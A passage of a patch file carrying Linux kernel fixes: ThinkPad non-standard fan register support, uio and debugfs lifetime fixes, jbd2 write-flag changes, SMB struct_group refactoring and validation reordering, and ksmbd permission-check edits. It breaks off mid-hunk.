+ 	TP_EC_FAN_FULLSPEED = 0x40,	/* EC fan mode: full speed */
+ 	TP_EC_FAN_AUTO	    = 0x80,	/* EC fan mode: auto fan control */
+ 
+@@ -8168,6 +8184,7 @@ enum fan_status_access_mode {
+ 	TPACPI_FAN_NONE = 0,		/* No fan status or control */
+ 	TPACPI_FAN_RD_ACPI_GFAN,	/* Use ACPI GFAN */
+ 	TPACPI_FAN_RD_TPEC,		/* Use ACPI EC regs 0x2f, 0x84-0x85 */
++	TPACPI_FAN_RD_TPEC_NS,		/* Use non-standard ACPI EC regs (eg: L13 Yoga gen2 etc.) */
+ };
+ 
+ enum fan_control_access_mode {
+@@ -8195,6 +8212,8 @@ static u8 fan_control_desired_level;
+ static u8 fan_control_resume_level;
+ static int fan_watchdog_maxinterval;
+ 
++static bool fan_with_ns_addr;
++
+ static struct mutex fan_mutex;
+ 
+ static void fan_watchdog_fire(struct work_struct *ignored);
+@@ -8325,6 +8344,15 @@ static int fan_get_status(u8 *status)
+ 		}
+ 
+ 		break;
++	case TPACPI_FAN_RD_TPEC_NS:
++		/* Default mode is AUTO which means controlled by EC */
++		if (!acpi_ec_read(fan_status_offset_ns, &s))
++			return -EIO;
++
++		if (status)
++			*status = s;
++
++		break;
+ 
+ 	default:
+ 		return -ENXIO;
+@@ -8341,7 +8369,8 @@ static int fan_get_status_safe(u8 *status)
+ 	if (mutex_lock_killable(&fan_mutex))
+ 		return -ERESTARTSYS;
+ 	rc = fan_get_status(&s);
+-	if (!rc)
++	/* NS EC doesn't have register with level settings */
++	if (!rc && !fan_with_ns_addr)
+ 		fan_update_desired_level(s);
+ 	mutex_unlock(&fan_mutex);
+ 
+@@ -8368,7 +8397,13 @@ static int fan_get_speed(unsigned int *speed)
+ 
+ 		if (likely(speed))
+ 			*speed = (hi << 8) | lo;
++		break;
++	case TPACPI_FAN_RD_TPEC_NS:
++		if (!acpi_ec_read(fan_rpm_status_ns, &lo))
++			return -EIO;
+ 
++		if (speed)
++			*speed = lo ? FAN_RPM_CAL_CONST / lo : 0;
+ 		break;
+ 
+ 	default:
+@@ -8380,7 +8415,7 @@ static int fan_get_speed(unsigned int *speed)
+ 
+ static int fan2_get_speed(unsigned int *speed)
+ {
+-	u8 hi, lo;
++	u8 hi, lo, status;
+ 	bool rc;
+ 
+ 	switch (fan_status_access_mode) {
+@@ -8396,7 +8431,21 @@ static int fan2_get_speed(unsigned int *speed)
+ 
+ 		if (likely(speed))
+ 			*speed = (hi << 8) | lo;
++		break;
+ 
++	case TPACPI_FAN_RD_TPEC_NS:
++		rc = !acpi_ec_read(fan2_status_offset_ns, &status);
++		if (rc)
++			return -EIO;
++		if (!(status & FAN_NS_CTRL_STATUS)) {
++			pr_info("secondary fan control not supported\n");
++			return -EIO;
++		}
++		rc = !acpi_ec_read(fan2_rpm_status_ns, &lo);
++		if (rc)
++			return -EIO;
++		if (speed)
++			*speed = lo ? FAN_RPM_CAL_CONST / lo : 0;
+ 		break;
+ 
+ 	default:
+@@ -8899,6 +8948,7 @@ static const struct attribute_group fan_driver_attr_group = {
+ #define TPACPI_FAN_2FAN		0x0002		/* EC 0x31 bit 0 selects fan2 */
+ #define TPACPI_FAN_2CTL		0x0004		/* selects fan2 control */
+ #define TPACPI_FAN_NOFAN	0x0008		/* no fan available */
++#define TPACPI_FAN_NS		0x0010		/* For EC with non-Standard register addresses */
+ 
+ static const struct tpacpi_quirk fan_quirk_table[] __initconst = {
+ 	TPACPI_QEC_IBM('1', 'Y', TPACPI_FAN_Q1),
+@@ -8917,6 +8967,8 @@ static const struct tpacpi_quirk fan_quirk_table[] __initconst = {
+ 	TPACPI_Q_LNV3('N', '2', 'O', TPACPI_FAN_2CTL),	/* P1 / X1 Extreme (2nd gen) */
+ 	TPACPI_Q_LNV3('N', '3', '0', TPACPI_FAN_2CTL),	/* P15 (1st gen) / P15v (1st gen) */
+ 	TPACPI_Q_LNV3('N', '3', '7', TPACPI_FAN_2CTL),  /* T15g (2nd gen) */
++	TPACPI_Q_LNV3('R', '1', 'F', TPACPI_FAN_NS),	/* L13 Yoga Gen 2 */
++	TPACPI_Q_LNV3('N', '2', 'U', TPACPI_FAN_NS),	/* X13 Yoga Gen 2*/
+ 	TPACPI_Q_LNV3('N', '1', 'O', TPACPI_FAN_NOFAN),	/* X1 Tablet (2nd gen) */
+ };
+ 
+@@ -8951,18 +9003,27 @@ static int __init fan_init(struct ibm_init_struct *iibm)
+ 		return -ENODEV;
+ 	}
+ 
++	if (quirks & TPACPI_FAN_NS) {
++		pr_info("ECFW with non-standard fan reg control found\n");
++		fan_with_ns_addr = 1;
++		/* Fan ctrl support from host is undefined for now */
++		tp_features.fan_ctrl_status_undef = 1;
++	}
++
+ 	if (gfan_handle) {
+ 		/* 570, 600e/x, 770e, 770x */
+ 		fan_status_access_mode = TPACPI_FAN_RD_ACPI_GFAN;
+ 	} else {
+ 		/* all other ThinkPads: note that even old-style
+ 		 * ThinkPad ECs supports the fan control register */
+-		if (likely(acpi_ec_read(fan_status_offset,
+-					&fan_control_initial_status))) {
++		if (fan_with_ns_addr ||
++		    likely(acpi_ec_read(fan_status_offset, &fan_control_initial_status))) {
+ 			int res;
+ 			unsigned int speed;
+ 
+-			fan_status_access_mode = TPACPI_FAN_RD_TPEC;
++			fan_status_access_mode = fan_with_ns_addr ?
++				TPACPI_FAN_RD_TPEC_NS : TPACPI_FAN_RD_TPEC;
++
+ 			if (quirks & TPACPI_FAN_Q1)
+ 				fan_quirk1_setup();
+ 			/* Try and probe the 2nd fan */
+@@ -8971,7 +9032,8 @@ static int __init fan_init(struct ibm_init_struct *iibm)
+ 			if (res >= 0 && speed != FAN_NOT_PRESENT) {
+ 				/* It responded - so let's assume it's there */
+ 				tp_features.second_fan = 1;
+-				tp_features.second_fan_ctl = 1;
++				/* fan control not currently available for ns ECFW */
++				tp_features.second_fan_ctl = !fan_with_ns_addr;
+ 				pr_info("secondary fan control detected & enabled\n");
+ 			} else {
+ 				/* Fan not auto-detected */
+@@ -9146,6 +9208,7 @@ static int fan_read(struct seq_file *m)
+ 			       str_enabled_disabled(status), status);
+ 		break;
+ 
++	case TPACPI_FAN_RD_TPEC_NS:
+ 	case TPACPI_FAN_RD_TPEC:
+ 		/* all except 570, 600e/x, 770e, 770x */
+ 		rc = fan_get_status_safe(&status);
+@@ -9160,13 +9223,22 @@ static int fan_read(struct seq_file *m)
+ 
+ 		seq_printf(m, "speed:\t\t%d\n", speed);
+ 
+-		if (status & TP_EC_FAN_FULLSPEED)
+-			/* Disengaged mode takes precedence */
+-			seq_printf(m, "level:\t\tdisengaged\n");
+-		else if (status & TP_EC_FAN_AUTO)
+-			seq_printf(m, "level:\t\tauto\n");
+-		else
+-			seq_printf(m, "level:\t\t%d\n", status);
++		if (fan_status_access_mode == TPACPI_FAN_RD_TPEC_NS) {
++			/*
++			 * No full speed bit in NS EC
++			 * EC Auto mode is set by default.
++			 * No other levels settings available
++			 */
++			seq_printf(m, "level:\t\t%s\n", status & FAN_NS_CTRL ? "unknown" : "auto");
++		} else {
++			if (status & TP_EC_FAN_FULLSPEED)
++				/* Disengaged mode takes precedence */
++				seq_printf(m, "level:\t\tdisengaged\n");
++			else if (status & TP_EC_FAN_AUTO)
++				seq_printf(m, "level:\t\tauto\n");
++			else
++				seq_printf(m, "level:\t\t%d\n", status);
++		}
+ 		break;
+ 
+ 	case TPACPI_FAN_NONE:
+diff --git a/drivers/reset/hisilicon/hi6220_reset.c b/drivers/reset/hisilicon/hi6220_reset.c
+index 5ca145b64e63d..30951914afac7 100644
+--- a/drivers/reset/hisilicon/hi6220_reset.c
++++ b/drivers/reset/hisilicon/hi6220_reset.c
+@@ -164,7 +164,7 @@ static int hi6220_reset_probe(struct platform_device *pdev)
+ 	if (!data)
+ 		return -ENOMEM;
+ 
+-	type = (enum hi6220_reset_ctrl_type)of_device_get_match_data(dev);
++	type = (uintptr_t)of_device_get_match_data(dev);
+ 
+ 	regmap = syscon_node_to_regmap(np);
+ 	if (IS_ERR(regmap)) {
+diff --git a/drivers/s390/block/scm_blk.c b/drivers/s390/block/scm_blk.c
+index 0c1df1d5f1aca..a165b1a59fde5 100644
+--- a/drivers/s390/block/scm_blk.c
++++ b/drivers/s390/block/scm_blk.c
+@@ -17,6 +17,7 @@
+ #include <linux/blk-mq.h>
+ #include <linux/slab.h>
+ #include <linux/list.h>
++#include <linux/io.h>
+ #include <asm/eadm.h>
+ #include "scm_blk.h"
+ 
+@@ -130,7 +131,7 @@ static void scm_request_done(struct scm_request *scmrq)
+ 
+ 	for (i = 0; i < nr_requests_per_io && scmrq->request[i]; i++) {
+ 		msb = &scmrq->aob->msb[i];
+-		aidaw = msb->data_addr;
++		aidaw = (u64)phys_to_virt(msb->data_addr);
+ 
+ 		if ((msb->flags & MSB_FLAG_IDA) && aidaw &&
+ 		    IS_ALIGNED(aidaw, PAGE_SIZE))
+@@ -195,12 +196,12 @@ static int scm_request_prepare(struct scm_request *scmrq)
+ 	msb->scm_addr = scmdev->address + ((u64) blk_rq_pos(req) << 9);
+ 	msb->oc = (rq_data_dir(req) == READ) ? MSB_OC_READ : MSB_OC_WRITE;
+ 	msb->flags |= MSB_FLAG_IDA;
+-	msb->data_addr = (u64) aidaw;
++	msb->data_addr = (u64)virt_to_phys(aidaw);
+ 
+ 	rq_for_each_segment(bv, req, iter) {
+ 		WARN_ON(bv.bv_offset);
+ 		msb->blk_count += bv.bv_len >> 12;
+-		aidaw->data_addr = (u64) page_address(bv.bv_page);
++		aidaw->data_addr = virt_to_phys(page_address(bv.bv_page));
+ 		aidaw++;
+ 	}
+ 
+diff --git a/drivers/uio/uio.c b/drivers/uio/uio.c
+index 43afbb7c5ab91..e55e8cef8defc 100644
+--- a/drivers/uio/uio.c
++++ b/drivers/uio/uio.c
+@@ -466,13 +466,13 @@ static int uio_open(struct inode *inode, struct file *filep)
+ 
+ 	mutex_lock(&minor_lock);
+ 	idev = idr_find(&uio_idr, iminor(inode));
+-	mutex_unlock(&minor_lock);
+ 	if (!idev) {
+ 		ret = -ENODEV;
++		mutex_unlock(&minor_lock);
+ 		goto out;
+ 	}
+-
+ 	get_device(&idev->dev);
++	mutex_unlock(&minor_lock);
+ 
+ 	if (!try_module_get(idev->owner)) {
+ 		ret = -ENODEV;
+@@ -1064,9 +1064,8 @@ void uio_unregister_device(struct uio_info *info)
+ 	wake_up_interruptible(&idev->wait);
+ 	kill_fasync(&idev->async_queue, SIGIO, POLL_HUP);
+ 
+-	device_unregister(&idev->dev);
+-
+ 	uio_free_minor(minor);
++	device_unregister(&idev->dev);
+ 
+ 	return;
+ }
+diff --git a/fs/debugfs/file.c b/fs/debugfs/file.c
+index b54f470e0d031..b38304b444764 100644
+--- a/fs/debugfs/file.c
++++ b/fs/debugfs/file.c
+@@ -84,6 +84,14 @@ int debugfs_file_get(struct dentry *dentry)
+ 	struct debugfs_fsdata *fsd;
+ 	void *d_fsd;
+ 
++	/*
++	 * This could only happen if some debugfs user erroneously calls
++	 * debugfs_file_get() on a dentry that isn't even a file, let
++	 * them know about it.
++	 */
++	if (WARN_ON(!d_is_reg(dentry)))
++		return -EINVAL;
++
+ 	d_fsd = READ_ONCE(dentry->d_fsdata);
+ 	if (!((unsigned long)d_fsd & DEBUGFS_FSDATA_IS_REAL_FOPS_BIT)) {
+ 		fsd = d_fsd;
+diff --git a/fs/debugfs/inode.c b/fs/debugfs/inode.c
+index 2e8e112b19930..08ef685167ec5 100644
+--- a/fs/debugfs/inode.c
++++ b/fs/debugfs/inode.c
+@@ -237,17 +237,19 @@ static const struct super_operations debugfs_super_operations = {
+ 
+ static void debugfs_release_dentry(struct dentry *dentry)
+ {
+-	void *fsd = dentry->d_fsdata;
++	struct debugfs_fsdata *fsd = dentry->d_fsdata;
+ 
+-	if (!((unsigned long)fsd & DEBUGFS_FSDATA_IS_REAL_FOPS_BIT))
+-		kfree(dentry->d_fsdata);
++	if ((unsigned long)fsd & DEBUGFS_FSDATA_IS_REAL_FOPS_BIT)
++		return;
++
++	kfree(fsd);
+ }
+ 
+ static struct vfsmount *debugfs_automount(struct path *path)
+ {
+-	debugfs_automount_t f;
+-	f = (debugfs_automount_t)path->dentry->d_fsdata;
+-	return f(path->dentry, d_inode(path->dentry)->i_private);
++	struct debugfs_fsdata *fsd = path->dentry->d_fsdata;
++
++	return fsd->automount(path->dentry, d_inode(path->dentry)->i_private);
+ }
+ 
+ static const struct dentry_operations debugfs_dops = {
+@@ -635,13 +637,23 @@ struct dentry *debugfs_create_automount(const char *name,
+ 					void *data)
+ {
+ 	struct dentry *dentry = start_creating(name, parent);
++	struct debugfs_fsdata *fsd;
+ 	struct inode *inode;
+ 
+ 	if (IS_ERR(dentry))
+ 		return dentry;
+ 
++	fsd = kzalloc(sizeof(*fsd), GFP_KERNEL);
++	if (!fsd) {
++		failed_creating(dentry);
++		return ERR_PTR(-ENOMEM);
++	}
++
++	fsd->automount = f;
++
+ 	if (!(debugfs_allow & DEBUGFS_ALLOW_API)) {
+ 		failed_creating(dentry);
++		kfree(fsd);
+ 		return ERR_PTR(-EPERM);
+ 	}
+ 
+@@ -649,13 +661,14 @@ struct dentry *debugfs_create_automount(const char *name,
+ 	if (unlikely(!inode)) {
+ 		pr_err("out of free dentries, can not create automount '%s'\n",
+ 		       name);
++		kfree(fsd);
+ 		return failed_creating(dentry);
+ 	}
+ 
+ 	make_empty_dir_inode(inode);
+ 	inode->i_flags |= S_AUTOMOUNT;
+ 	inode->i_private = data;
+-	dentry->d_fsdata = (void *)f;
++	dentry->d_fsdata = fsd;
+ 	/* directory inodes start off with i_nlink == 2 (for "." entry) */
+ 	inc_nlink(inode);
+ 	d_instantiate(dentry, inode);
+diff --git a/fs/debugfs/internal.h b/fs/debugfs/internal.h
+index 92af8ae313134..f7c489b5a368c 100644
+--- a/fs/debugfs/internal.h
++++ b/fs/debugfs/internal.h
+@@ -17,8 +17,14 @@ extern const struct file_operations debugfs_full_proxy_file_operations;
+ 
+ struct debugfs_fsdata {
+ 	const struct file_operations *real_fops;
+-	refcount_t active_users;
+-	struct completion active_users_drained;
++	union {
++		/* automount_fn is used when real_fops is NULL */
++		debugfs_automount_t automount;
++		struct {
++			refcount_t active_users;
++			struct completion active_users_drained;
++		};
++	};
+ };
+ 
+ /*
+diff --git a/fs/f2fs/xattr.c b/fs/f2fs/xattr.c
+index adaad16468d8a..8816e13ca7c9e 100644
+--- a/fs/f2fs/xattr.c
++++ b/fs/f2fs/xattr.c
+@@ -754,6 +754,12 @@ retry:
+ 		memcpy(pval, value, size);
+ 		last->e_value_size = cpu_to_le16(size);
+ 		new_hsize += newsize;
++		/*
++		 * Explicitly add the null terminator.  The unused xattr space
++		 * is supposed to always be zeroed, which would make this
++		 * unnecessary, but don't depend on that.
++		 */
++		*(u32 *)((u8 *)last + newsize) = 0;
+ 	}
+ 
+ 	error = write_all_xattrs(inode, new_hsize, base_addr, ipage);
+diff --git a/fs/jbd2/commit.c b/fs/jbd2/commit.c
+index f1d9db6686e31..556b259a00ba6 100644
+--- a/fs/jbd2/commit.c
++++ b/fs/jbd2/commit.c
+@@ -123,7 +123,7 @@ static int journal_submit_commit_record(journal_t *journal,
+ 	struct commit_header *tmp;
+ 	struct buffer_head *bh;
+ 	struct timespec64 now;
+-	blk_opf_t write_flags = REQ_OP_WRITE | REQ_SYNC;
++	blk_opf_t write_flags = REQ_OP_WRITE | JBD2_JOURNAL_REQ_FLAGS;
+ 
+ 	*cbh = NULL;
+ 
+@@ -300,6 +300,7 @@ static int journal_finish_inode_data_buffers(journal_t *journal,
+ 			if (!ret)
+ 				ret = err;
+ 		}
++		cond_resched();
+ 		spin_lock(&journal->j_list_lock);
+ 		jinode->i_flags &= ~JI_COMMIT_RUNNING;
+ 		smp_mb();
+@@ -429,8 +430,7 @@ void jbd2_journal_commit_transaction(journal_t *journal)
+ 		 */
+ 		jbd2_journal_update_sb_log_tail(journal,
+ 						journal->j_tail_sequence,
+-						journal->j_tail,
+-						REQ_SYNC);
++						journal->j_tail, 0);
+ 		mutex_unlock(&journal->j_checkpoint_mutex);
+ 	} else {
+ 		jbd2_debug(3, "superblock not updated\n");
+@@ -749,6 +749,7 @@ start_journal_io:
+ 
+ 			for (i = 0; i < bufs; i++) {
+ 				struct buffer_head *bh = wbuf[i];
++
+ 				/*
+ 				 * Compute checksum.
+ 				 */
+@@ -761,7 +762,8 @@ start_journal_io:
+ 				clear_buffer_dirty(bh);
+ 				set_buffer_uptodate(bh);
+ 				bh->b_end_io = journal_end_buffer_io_sync;
+-				submit_bh(REQ_OP_WRITE | REQ_SYNC, bh);
++				submit_bh(REQ_OP_WRITE | JBD2_JOURNAL_REQ_FLAGS,
++					  bh);
+ 			}
+ 			cond_resched();
+ 
+diff --git a/fs/jbd2/journal.c b/fs/jbd2/journal.c
+index 2696f43e7239f..3df45e4699f10 100644
+--- a/fs/jbd2/journal.c
++++ b/fs/jbd2/journal.c
+@@ -1109,8 +1109,7 @@ int __jbd2_update_log_tail(journal_t *journal, tid_t tid, unsigned long block)
+ 	 * space and if we lose sb update during power failure we'd replay
+ 	 * old transaction with possibly newly overwritten data.
+ 	 */
+-	ret = jbd2_journal_update_sb_log_tail(journal, tid, block,
+-					      REQ_SYNC | REQ_FUA);
++	ret = jbd2_journal_update_sb_log_tail(journal, tid, block, REQ_FUA);
+ 	if (ret)
+ 		goto out;
+ 
+@@ -1597,8 +1596,7 @@ static int journal_reset(journal_t *journal)
+ 		 */
+ 		jbd2_journal_update_sb_log_tail(journal,
+ 						journal->j_tail_sequence,
+-						journal->j_tail,
+-						REQ_SYNC | REQ_FUA);
++						journal->j_tail, REQ_FUA);
+ 		mutex_unlock(&journal->j_checkpoint_mutex);
+ 	}
+ 	return jbd2_journal_start_thread(journal);
+@@ -1620,9 +1618,16 @@ static int jbd2_write_superblock(journal_t *journal, blk_opf_t write_flags)
+ 		return -EIO;
+ 	}
+ 
+-	trace_jbd2_write_superblock(journal, write_flags);
++	/*
++	 * Always set high priority flags to exempt from block layer's
++	 * QOS policies, e.g. writeback throttle.
++	 */
++	write_flags |= JBD2_JOURNAL_REQ_FLAGS;
+ 	if (!(journal->j_flags & JBD2_BARRIER))
+ 		write_flags &= ~(REQ_FUA | REQ_PREFLUSH);
++
++	trace_jbd2_write_superblock(journal, write_flags);
++
+ 	if (buffer_write_io_error(bh)) {
+ 		/*
+ 		 * Oh, dear.  A previous attempt to write the journal
+@@ -1871,7 +1876,7 @@ void jbd2_journal_update_sb_errno(journal_t *journal)
+ 	jbd2_debug(1, "JBD2: updating superblock error (errno %d)\n", errcode);
+ 	sb->s_errno    = cpu_to_be32(errcode);
+ 
+-	jbd2_write_superblock(journal, REQ_SYNC | REQ_FUA);
++	jbd2_write_superblock(journal, REQ_FUA);
+ }
+ EXPORT_SYMBOL(jbd2_journal_update_sb_errno);
+ 
+@@ -2176,8 +2181,7 @@ int jbd2_journal_destroy(journal_t *journal)
+ 				++journal->j_transaction_sequence;
+ 			write_unlock(&journal->j_state_lock);
+ 
+-			jbd2_mark_journal_empty(journal,
+-					REQ_SYNC | REQ_PREFLUSH | REQ_FUA);
++			jbd2_mark_journal_empty(journal, REQ_PREFLUSH | REQ_FUA);
+ 			mutex_unlock(&journal->j_checkpoint_mutex);
+ 		} else
+ 			err = -EIO;
+@@ -2486,7 +2490,7 @@ int jbd2_journal_flush(journal_t *journal, unsigned int flags)
+ 	 * the magic code for a fully-recovered superblock.  Any future
+ 	 * commits of data to the journal will restore the current
+ 	 * s_start value. */
+-	jbd2_mark_journal_empty(journal, REQ_SYNC | REQ_FUA);
++	jbd2_mark_journal_empty(journal, REQ_FUA);
+ 
+ 	if (flags)
+ 		err = __jbd2_journal_erase(journal, flags);
+@@ -2536,7 +2540,7 @@ int jbd2_journal_wipe(journal_t *journal, int write)
+ 	if (write) {
+ 		/* Lock to make assertions happy... */
+ 		mutex_lock_io(&journal->j_checkpoint_mutex);
+-		jbd2_mark_journal_empty(journal, REQ_SYNC | REQ_FUA);
++		jbd2_mark_journal_empty(journal, REQ_FUA);
+ 		mutex_unlock(&journal->j_checkpoint_mutex);
+ 	}
+ 
+diff --git a/fs/smb/client/cifspdu.h b/fs/smb/client/cifspdu.h
+index c403816d0b6c1..97bb1838555b4 100644
+--- a/fs/smb/client/cifspdu.h
++++ b/fs/smb/client/cifspdu.h
+@@ -882,11 +882,13 @@ typedef struct smb_com_open_rsp {
+ 	__u8 OplockLevel;
+ 	__u16 Fid;
+ 	__le32 CreateAction;
+-	__le64 CreationTime;
+-	__le64 LastAccessTime;
+-	__le64 LastWriteTime;
+-	__le64 ChangeTime;
+-	__le32 FileAttributes;
++	struct_group(common_attributes,
++		__le64 CreationTime;
++		__le64 LastAccessTime;
++		__le64 LastWriteTime;
++		__le64 ChangeTime;
++		__le32 FileAttributes;
++	);
+ 	__le64 AllocationSize;
+ 	__le64 EndOfFile;
+ 	__le16 FileType;
+@@ -2268,11 +2270,13 @@ typedef struct {
+ /* QueryFileInfo/QueryPathinfo (also for SetPath/SetFile) data buffer formats */
+ /******************************************************************************/
+ typedef struct { /* data block encoding of response to level 263 QPathInfo */
+-	__le64 CreationTime;
+-	__le64 LastAccessTime;
+-	__le64 LastWriteTime;
+-	__le64 ChangeTime;
+-	__le32 Attributes;
++	struct_group(common_attributes,
++		__le64 CreationTime;
++		__le64 LastAccessTime;
++		__le64 LastWriteTime;
++		__le64 ChangeTime;
++		__le32 Attributes;
++	);
+ 	__u32 Pad1;
+ 	__le64 AllocationSize;
+ 	__le64 EndOfFile;	/* size ie offset to first free byte in file */
+diff --git a/fs/smb/client/cifssmb.c b/fs/smb/client/cifssmb.c
+index c90d4ec9292ca..67c5fc2b2db94 100644
+--- a/fs/smb/client/cifssmb.c
++++ b/fs/smb/client/cifssmb.c
+@@ -1234,8 +1234,10 @@ openRetry:
+ 		*oplock |= CIFS_CREATE_ACTION;
+ 
+ 	if (buf) {
+-		/* copy from CreationTime to Attributes */
+-		memcpy((char *)buf, (char *)&rsp->CreationTime, 36);
++		/* copy commonly used attributes */
++		memcpy(&buf->common_attributes,
++		       &rsp->common_attributes,
++		       sizeof(buf->common_attributes));
+ 		/* the file_info buf is endian converted by caller */
+ 		buf->AllocationSize = rsp->AllocationSize;
+ 		buf->EndOfFile = rsp->EndOfFile;
+diff --git a/fs/smb/client/smb2misc.c b/fs/smb/client/smb2misc.c
+index fdf7a7f188c5f..15fa022e79993 100644
+--- a/fs/smb/client/smb2misc.c
++++ b/fs/smb/client/smb2misc.c
+@@ -173,6 +173,21 @@ smb2_check_message(char *buf, unsigned int len, struct TCP_Server_Info *server)
+ 	}
+ 
+ 	mid = le64_to_cpu(shdr->MessageId);
++	if (check_smb2_hdr(shdr, mid))
++		return 1;
++
++	if (shdr->StructureSize != SMB2_HEADER_STRUCTURE_SIZE) {
++		cifs_dbg(VFS, "Invalid structure size %u\n",
++			 le16_to_cpu(shdr->StructureSize));
++		return 1;
++	}
++
++	command = le16_to_cpu(shdr->Command);
++	if (command >= NUMBER_OF_SMB2_COMMANDS) {
++		cifs_dbg(VFS, "Invalid SMB2 command %d\n", command);
++		return 1;
++	}
++
+ 	if (len < pdu_size) {
+ 		if ((len >= hdr_size)
+ 		    && (shdr->Status != 0)) {
+@@ -193,21 +208,6 @@ smb2_check_message(char *buf, unsigned int len, struct TCP_Server_Info *server)
+ 		return 1;
+ 	}
+ 
+-	if (check_smb2_hdr(shdr, mid))
+-		return 1;
+-
+-	if (shdr->StructureSize != SMB2_HEADER_STRUCTURE_SIZE) {
+-		cifs_dbg(VFS, "Invalid structure size %u\n",
+-			 le16_to_cpu(shdr->StructureSize));
+-		return 1;
+-	}
+-
+-	command = le16_to_cpu(shdr->Command);
+-	if (command >= NUMBER_OF_SMB2_COMMANDS) {
+-		cifs_dbg(VFS, "Invalid SMB2 command %d\n", command);
+-		return 1;
+-	}
+-
+ 	if (smb2_rsp_struct_sizes[command] != pdu->StructureSize2) {
+ 		if (command != SMB2_OPLOCK_BREAK_HE && (shdr->Status == 0 ||
+ 		    pdu->StructureSize2 != SMB2_ERROR_STRUCTURE_SIZE2_LE)) {
+diff --git a/fs/smb/client/smb2ops.c b/fs/smb/client/smb2ops.c
+index 4596d2dfdec3a..5a157000bdfe6 100644
+--- a/fs/smb/client/smb2ops.c
++++ b/fs/smb/client/smb2ops.c
+@@ -398,8 +398,10 @@ smb2_dump_detail(void *buf, struct TCP_Server_Info *server)
+ 	cifs_server_dbg(VFS, "Cmd: %d Err: 0x%x Flags: 0x%x Mid: %llu Pid: %d\n",
+ 		 shdr->Command, shdr->Status, shdr->Flags, shdr->MessageId,
+ 		 shdr->Id.SyncId.ProcessId);
+-	cifs_server_dbg(VFS, "smb buf %p len %u\n", buf,
+-		 server->ops->calc_smb_size(buf));
++	if (!server->ops->check_message(buf, server->total_read, server)) {
++		cifs_server_dbg(VFS, "smb buf %p len %u\n", buf,
++				server->ops->calc_smb_size(buf));
++	}
+ #endif
+ }
+ 
+diff --git a/fs/smb/client/smb2pdu.c b/fs/smb/client/smb2pdu.c
+index 2dfbf1b23cfa0..e65f998ea4cfc 100644
+--- a/fs/smb/client/smb2pdu.c
++++ b/fs/smb/client/smb2pdu.c
+@@ -3429,12 +3429,10 @@ __SMB2_close(const unsigned int xid, struct cifs_tcon *tcon,
+ 	} else {
+ 		trace_smb3_close_done(xid, persistent_fid, tcon->tid,
+ 				      ses->Suid);
+-		/*
+-		 * Note that have to subtract 4 since struct network_open_info
+-		 * has a final 4 byte pad that close response does not have
+-		 */
+ 		if (pbuf)
+-			memcpy(pbuf, (char *)&rsp->CreationTime, sizeof(*pbuf) - 4);
++			memcpy(&pbuf->network_open_info,
++			       &rsp->network_open_info,
++			       sizeof(pbuf->network_open_info));
+ 	}
+ 
+ 	atomic_dec(&tcon->num_remote_opens);
+diff --git a/fs/smb/client/smb2pdu.h b/fs/smb/client/smb2pdu.h
+index a5773a06aba8e..8d011fedecd03 100644
+--- a/fs/smb/client/smb2pdu.h
++++ b/fs/smb/client/smb2pdu.h
+@@ -339,13 +339,15 @@ struct smb2_file_reparse_point_info {
+ } __packed;
+ 
+ struct smb2_file_network_open_info {
+-	__le64 CreationTime;
+-	__le64 LastAccessTime;
+-	__le64 LastWriteTime;
+-	__le64 ChangeTime;
+-	__le64 AllocationSize;
+-	__le64 EndOfFile;
+-	__le32 Attributes;
++	struct_group(network_open_info,
++		__le64 CreationTime;
++		__le64 LastAccessTime;
++		__le64 LastWriteTime;
++		__le64 ChangeTime;
++		__le64 AllocationSize;
++		__le64 EndOfFile;
++		__le32 Attributes;
++	);
+ 	__le32 Reserved;
+ } __packed; /* level 34 Query also similar returned in close rsp and open rsp */
+ 
+diff --git a/fs/smb/common/smb2pdu.h b/fs/smb/common/smb2pdu.h
+index 5593bb49954c6..a3936ff53d9d0 100644
+--- a/fs/smb/common/smb2pdu.h
++++ b/fs/smb/common/smb2pdu.h
+@@ -699,13 +699,16 @@ struct smb2_close_rsp {
+ 	__le16 StructureSize; /* 60 */
+ 	__le16 Flags;
+ 	__le32 Reserved;
+-	__le64 CreationTime;
+-	__le64 LastAccessTime;
+-	__le64 LastWriteTime;
+-	__le64 ChangeTime;
+-	__le64 AllocationSize;	/* Beginning of FILE_STANDARD_INFO equivalent */
+-	__le64 EndOfFile;
+-	__le32 Attributes;
++	struct_group(network_open_info,
++		__le64 CreationTime;
++		__le64 LastAccessTime;
++		__le64 LastWriteTime;
++		__le64 ChangeTime;
++		/* Beginning of FILE_STANDARD_INFO equivalent */
++		__le64 AllocationSize;
++		__le64 EndOfFile;
++		__le32 Attributes;
++	);
+ } __packed;
+ 
+ 
+diff --git a/fs/smb/server/smb2pdu.c b/fs/smb/server/smb2pdu.c
+index 6e5ed0ac578a6..46070951d163a 100644
+--- a/fs/smb/server/smb2pdu.c
++++ b/fs/smb/server/smb2pdu.c
+@@ -2969,7 +2969,7 @@ int smb2_open(struct ksmbd_work *work)
+ 					    &may_flags);
+ 
+ 	if (!test_tree_conn_flag(tcon, KSMBD_TREE_CONN_FLAG_WRITABLE)) {
+-		if (open_flags & O_CREAT) {
++		if (open_flags & (O_CREAT | O_TRUNC)) {
+ 			ksmbd_debug(SMB,
+ 				    "User does not have write permission\n");
+ 			rc = -EACCES;
+@@ -5941,12 +5941,6 @@ static int smb2_set_info_file(struct ksmbd_work *work, struct ksmbd_file *fp,
+ 	}
+ 	case FILE_RENAME_INFORMATION:
+ 	{
+-		if (!test_tree_conn_flag(work->tcon, KSMBD_TREE_CONN_FLAG_WRITABLE)) {
+-			ksmbd_debug(SMB,
+-				    "User does not have write permission\n");
+-			return -EACCES;
+-		}
+-
+ 		if (buf_len < sizeof(struct smb2_file_rename_info))
+ 			return -EINVAL;
+ 
+@@ -5966,12 +5960,6 @@ static int smb2_set_info_file(struct ksmbd_work *work, struct ksmbd_file *fp,
+ 	}
+ 	case FILE_DISPOSITION_INFORMATION:
+ 	{
+-		if (!test_tree_conn_flag(work->tcon, KSMBD_TREE_CONN_FLAG_WRITABLE)) {
+-			ksmbd_debug(SMB,
+-				    "User does not have write permission\n");
+-			return -EACCES;
+-		}
+-
+ 		if (buf_len < sizeof(struct smb2_file_disposition_info))
+ 			return -EINVAL;
+ 
+@@ -6033,7 +6021,7 @@ int smb2_set_info(struct ksmbd_work *work)
+ {
+ 	struct smb2_set_info_req *req;
+ 	struct smb2_set_info_rsp *rsp;
+-	struct ksmbd_file *fp;
++	struct ksmbd_file *fp = NULL;
+ 	int rc = 0;
+ 	unsigned int id = KSMBD_NO_FID, pid = KSMBD_NO_FID;
+ 
+@@ -6053,6 +6041,13 @@ int smb2_set_info(struct ksmbd_work *work)
